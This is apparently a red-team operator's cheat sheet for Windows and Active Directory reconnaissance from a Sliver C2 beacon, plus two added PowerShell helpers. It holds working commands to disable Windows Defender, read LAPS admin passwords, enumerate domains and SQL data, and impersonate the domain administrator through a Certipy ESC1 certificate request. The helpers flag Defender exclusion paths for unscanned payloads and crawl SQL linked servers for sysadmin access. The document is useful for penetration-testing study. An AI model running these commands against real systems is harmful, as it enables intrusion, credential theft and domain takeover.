Recon
Windows recon
Some commands are meant to be run from a Sliver beacon (the sharp-hound-4, sharpview, sharpup and execute-assembly lines use Sliver's armory / execute-assembly syntax), but they can be adapted to other C2 frameworks with minimal changes.
- Windows Defender
Get-MpComputerStatus
# or
sc query windefend
BONUS: Disable Defender (needs local admin, has no effect while Tamper Protection is on, so check IsTamperProtected in Get-MpComputerStatus first; it also raises a Defender event, so expect it to be noticed)
Set-MpPreference -DisableRealtimeMonitoring $true
- Applocker policies
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
- Powershell language mode
$ExecutionContext.SessionState.LanguageMode
- LAPS
# LAPSToolkit (legacy LAPS, ms-Mcs-AdmPwd): who can read the passwords and which computers have one
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers
BONUS: Read LAPS password (only if the current user holds the read right; COM is the computer name). Get-LapsADPassword is from the Windows LAPS module; for legacy LAPS the AdmPwd.PS module's Get-AdmPwdPassword does the same job
Get-LapsADPassword -Identity COM -AsPlainText
- Go-to Sharphound command
sharp-hound-4 -i -s -t 100 -- -c All
- Get list of domain users
sharpview -t 1000 -- Get-DomainUser -Domain eu.junon.vl -Properties samaccountname
- Simple privesc check
sharpup audit
- Check if a proxy is enabled (Powershell)
# obsolete API but still works on Windows PowerShell 5.1; returns the current user's WinINET (Internet Settings) proxy
[System.Net.WebProxy]::GetDefaultProxy()
- Get named pipes
get-childitem \\.\pipe\
# PowerShell has no backslash escapes, so the path is written with single backslashes (the doubled form is the C# spelling)
[System.IO.Directory]::GetFiles("\\.\pipe\")
(get-childitem \\.\pipe\).FullName
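Added example, not part of the original notes: the host checks above (Defender, AppLocker, language mode, proxy, named pipes) folded into one PowerShell function that degrades gracefully when a module is missing and avoids .NET static calls so it still runs under ConstrainedLanguage mode. The list of "interesting" pipe names and the function name are my own assumptions; everything else is a built-in cmdlet or the Defender/AppLocker modules already used above.

```powershell
# Added example: one-shot host posture check built from the individual commands above.
# Runs in a normal PowerShell session on the target; from a beacon, feed it to the
# framework's PowerShell runner. Nothing here writes to the host.
function Get-HostSecurityPosture {
    [CmdletBinding()]
    param(
        # Pipe names worth a closer look (RPC/SMB-backed services). Assumed list; extend per engagement.
        [string[]]$InterestingPipes = @('lsass', 'samr', 'netlogon', 'srvsvc', 'spoolss', 'winreg', 'atsvc', 'efsrpc')
    )

    $r = [ordered]@{}

    # Language mode first: in ConstrainedLanguage most .NET calls are blocked, which is why
    # the rest of this function sticks to cmdlets rather than static method calls.
    $r.LanguageMode = "$($ExecutionContext.SessionState.LanguageMode)"

    # Defender: prefer the module, fall back to the service state when it is unavailable
    try {
        $mp = Get-MpComputerStatus -ErrorAction Stop
        $r.DefenderRealTime   = $mp.RealTimeProtectionEnabled
        $r.DefenderTamper     = $mp.IsTamperProtected   # Set-MpPreference changes are ignored while this is True
        $r.DefenderExclusions = (Get-MpPreference -ErrorAction Stop).ExclusionPath   # may be hidden from non-admins on newer builds
    } catch {
        $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
        $r.DefenderRealTime   = if ($svc) { $svc.Status -eq 'Running' } else { 'no WinDefend service' }
        $r.DefenderTamper     = 'unknown'
        $r.DefenderExclusions = 'unknown'
    }

    # AppLocker: one entry per rule collection as Type:EnforcementMode:RuleCount
    try {
        $pol = Get-AppLockerPolicy -Effective -ErrorAction Stop
        $r.AppLocker = @($pol.RuleCollections | ForEach-Object {
            '{0}:{1}:{2}' -f $_.RuleCollectionType, $_.EnforcementMode, $_.Count
        })
    } catch {
        $r.AppLocker = 'AppLocker module unavailable'
    }

    # Proxy: read the per-user WinINET settings directly instead of the obsolete
    # [System.Net.WebProxy]::GetDefaultProxy() API, which reports the same values
    $ie = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -ErrorAction SilentlyContinue
    $r.ProxyEnabled    = [bool]$ie.ProxyEnable
    $r.ProxyServer     = $ie.ProxyServer
    $r.ProxyAutoConfig = $ie.AutoConfigURL

    # Named pipes: Get-ChildItem works here where Directory.GetFiles() would be blocked by CLM
    $pipes = @(Get-ChildItem -Path '\\.\pipe\' -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Name)
    $r.PipeCount        = $pipes.Count
    $r.InterestingPipes = @($pipes | Where-Object { $InterestingPipes -contains $_ })

    [pscustomobject]$r
}

Get-HostSecurityPosture | Format-List
```

The function returns one object, so it can be piped to Export-Clixml or ConvertTo-Json when collecting from many hosts; the Defender exclusion paths are usually the first thing to read, since anything dropped into an excluded directory is not scanned.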
- Certipy ADCS enumeration, request and authentication
certipy find -username username@domain.com -password password -vulnerable -stdout
# or
certipy find -username username@domain.com -password password -vulnerable --old-bloodhound
# -upn sets the SubjectAltName of the requested cert; it is only honoured by templates that allow an enrollee-supplied subject (the ESC1 case reported by the find command)
certipy req -u 'username@domain.com' -p 'password' -dc-ip 10.10.10.10 -ca 'name-DC-CA' -template 'templateName' -upn 'administrator@domain.com' -target 'DC.domain.com' -key-size 4096
certipy auth -pfx administrator.pfx -dc-ip '10.10.10.10' -username 'administrator' -domain domain.com
- Seatbelt (useful commands)
execute-assembly -i -E seatbelt.exe -group=system
execute-assembly -i -E seatbelt.exe InternetSettings
- Windows Services
sc query
Get-Service | fl
- Domain trusts
# powerview
Get-DomainTrust -Domain domain.com
# ActiveDirectory module
Get-ADTrust -Filter *
# built-in, no module needed
nltest /domain_trusts
- Enumerate domain shares
Find-DomainShare -ComputerDomain domain.com -CheckShareAccess
- Enumerate databases
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "KEYWORD" -SampleSize 5 | select instance, database, column, sample | ft -autosize
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select * from information_schema.tables')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select column_name from master.information_schema.columns')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select top 5 OrgNumber from master.dbo.VIPClients')"
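Added example, not from the original notes: a PowerShell helper on top of PowerUpSQL's Get-SQLQuery that discovers linked servers from sys.servers and runs one query through every hop, building the nested openquery string in code so the single-quote doubling required at each nesting level is never done by hand. The function and parameter names are mine, "SQL01,1433" is a placeholder instance, and it assumes PowerUpSQL is loaded and the current login can reach the first instance. PowerUpSQL also ships Get-SQLServerLinkCrawl for this job; the point here is showing how the nesting and escaping work.

```powershell
# Added example: crawl linked servers from an instance and run one query at every hop.
# Assumes PowerUpSQL is loaded (Get-SQLQuery) and the current token can log in to $Instance.
# "SQL01,1433" is a placeholder instance name.
function Invoke-LinkedServerQuery {
    param(
        [Parameter(Mandatory)][string]$Instance,
        # Default query: who am I on the remote side and am I sysadmin there
        [string]$Query = "select @@servername as srv, system_user as login, is_srvrolemember('sysadmin') as sa",
        [int]$MaxDepth = 3
    )

    # Every openquery level wraps the inner query in a single-quoted string literal, so each
    # single quote must be doubled once per level. Wrapping from the far end of the path inward
    # gets the escaping right without hand-counting quotes. Bracketed server names avoid
    # depending on QUOTED_IDENTIFIER the way the "HOSTNAME" form above does.
    function New-NestedQuery([string[]]$Path, [string]$Inner) {
        $q = $Inner
        for ($i = $Path.Count - 1; $i -ge 0; $i--) {
            $q = "select * from openquery([{0}], '{1}')" -f $Path[$i], ($q -replace "'", "''")
        }
        return $q
    }

    function Walk([string[]]$Path, [int]$Depth) {
        # Links visible from the current hop; is_linked = 1 excludes the local server row
        $listQuery = New-NestedQuery -Path $Path -Inner "select name from sys.servers where is_linked = 1"
        $links = @(Get-SQLQuery -Instance $Instance -Query $listQuery | Select-Object -ExpandProperty name)
        foreach ($link in $links) {
            if ($Path -contains $link) { continue }   # A -> B -> A loop guard
            $next = $Path + $link
            # An error here usually means the link's login mapping has no rights on that hop; keep crawling
            $row = Get-SQLQuery -Instance $Instance -Query (New-NestedQuery -Path $next -Inner $Query) -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Path     = ($next -join ' -> ')
                Srv      = $row.srv
                Login    = $row.login
                Sysadmin = [bool]$row.sa
            }
            if ($Depth -lt $MaxDepth) { Walk -Path $next -Depth ($Depth + 1) }
        }
    }

    Walk -Path @() -Depth 1
}

Invoke-LinkedServerQuery -Instance "SQL01,1433" | Format-Table -AutoSize
```

A row with Sysadmin = True on a hop reached through a link is the interesting result: the link's stored credential, not your own login, is what runs there, and if RPC Out is enabled on that link the same path can carry EXEC AT statements rather than read-only openquery.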